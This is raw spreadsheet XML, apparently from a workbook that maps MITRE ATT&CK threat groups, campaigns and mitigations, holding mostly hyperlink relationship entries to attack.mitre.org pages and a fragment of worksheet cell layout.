Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0087" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0054" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0013" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0080" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0105" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0061" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0115" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0077" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0002" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G1008" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0010" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0112" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0025" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0068" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0033" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0067" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0001" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0098" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0114" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0070" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G1006" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0051" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0093" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G1001" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0004" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0095" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0034" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0122" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0127" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0027" TargetMode="External"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0107" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/table" Target="../tables/table6.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0007" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0037" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0032" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0103" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0055" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0040" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0075" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0134" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0005" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0050" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0096" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0135" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0142" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0012" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0020" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0084" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0136" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0121" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0038" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0089" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0123" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0044" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G1007" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0035" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0137" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0043" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0094" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0065" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0069" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0049" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G1005" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0024" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0062" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0018" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0099" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0026" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0082" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G1002" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0108" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0079" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0085" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0036" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0083" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0088" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0076" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0124" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0022" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0003" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0066" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0046" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0047" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0126" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0140" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0059" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0021" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0019" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0011" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0106" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0029" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0081" TargetMode="External"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0102" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0023" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0016" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0064" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0130" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0009" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0041" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0052" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0053" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0117" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0030" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0048" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0091" TargetMode="External"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0131" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0090" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0073" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G1004" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0056" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0006" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0008" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0060" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0017" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G1003" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0100" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0133" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0039" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0139" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0128" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0078" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G1009" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0138"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attack.mitre.org/campaigns/C0012" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/campaigns/C0014" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/campaigns/C0015" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/campaigns/C0002" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/campaigns/C0005" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/campaigns/C0011" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/campaigns/C0010" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/campaigns/C0007" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/campaigns/C0013" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/campaigns/C0001" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/campaigns/C0006" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/campaigns/C0004" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/campaigns/C0016" TargetMode="External"/><Relationship Id="rId1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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1046" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1042" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1050" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1028" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1051" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1049" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1034" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1024" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1017" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1040" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1057" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1038" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1030" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1044" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1019" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1015" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1039" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1035" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1026" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1018" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1036" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1047" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1053" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1031" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1022" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1054" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1052" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1048" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1041" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1032" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1056" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1020" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1043" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1037" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1029" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/table" Target="../tables/table8.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1013" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1045" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1055" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1033" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1027" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1025" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1021" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1016"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G5"/>
  <sheetViews>
    <sheetView tabSelected="1" zoomScale="85" zoomScaleNormal="85" workbookViewId="0">
      <selection activeCell="E11" sqref="E11"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.55000000000000004"/>
  <cols>
    <col min="1" max="1" width="11.578125" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="10.5234375" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="21.20703125" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="14.7890625" customWidth="1"/>
    <col min="5" max="5" width="15.05078125" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="13.1015625" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="16.68359375" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:7" ht="14.7" thickBot="1" x14ac:dyDescent="0.6"/>
    <row r="2" spans="1:7" ht="20.399999999999999" customHeight="1" thickBot="1" x14ac:dyDescent="0.6">
      <c r="B2" s="10" t="s">
        <v>33564</v>
      </c>
      <c r="C2" s="11" t="s">
        <v>33567</v>
      </c>
      <c r="D2" s="12" t="s">
        <v>33553</v>
      </c>
    </row>
    <row r="3" spans="1:7" x14ac:dyDescent="0.55000000000000004">
      <c r="D3" t="s">
        <v>33553</v>
      </c>
    </row>
    <row r="4" spans="1:7" x14ac:dyDescent="0.55000000000000004">
      <c r="A4" t="s">
        <v>33557</v>
      </c>
      <c r="B4" t="s">
        <v>33560</v>
      </c>
      <c r="C4" t="s">
